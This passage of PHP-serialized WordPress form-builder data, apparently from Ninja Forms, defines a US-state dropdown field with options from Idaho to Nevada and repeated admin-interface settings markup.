dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:12;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Idaho\";s:5:\"value\";s:2:\"ID\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:13;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Illinois\";s:5:\"value\";s:2:\"IL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:14;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Indiana\";s:5:\"value\";s:2:\"IN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:15;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Iowa\";s:5:\"value\";s:2:\"IA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:16;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Kansas\";s:5:\"value\";s:2:\"KS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:17;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Kentucky\";s:5:\"value\";s:2:\"KY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:18;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Louisiana\";s:5:\"value\";s:2:\"LA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:19;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Maine\";s:5:\"value\";s:2:\"ME\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:20;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Maryland\";s:5:\"value\";s:2:\"MD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:21;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Massachusetts\";s:5:\"value\";s:2:\"MA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:22;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Michigan\";s:5:\"value\";s:2:\"MI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:23;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Minnesota\";s:5:\"value\";s:2:\"MN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:24;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:11:\"Mississippi\";s:5:\"value\";s:2:\"MS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:25;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Missouri\";s:5:\"value\";s:2:\"MO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:26;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Montana\";s:5:\"value\";s:2:\"MT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:27;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Nebraska\";s:5:\"value\";s:2:\"NE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:28;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Nevada\";s:5:\"value\";s:2:\"NV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 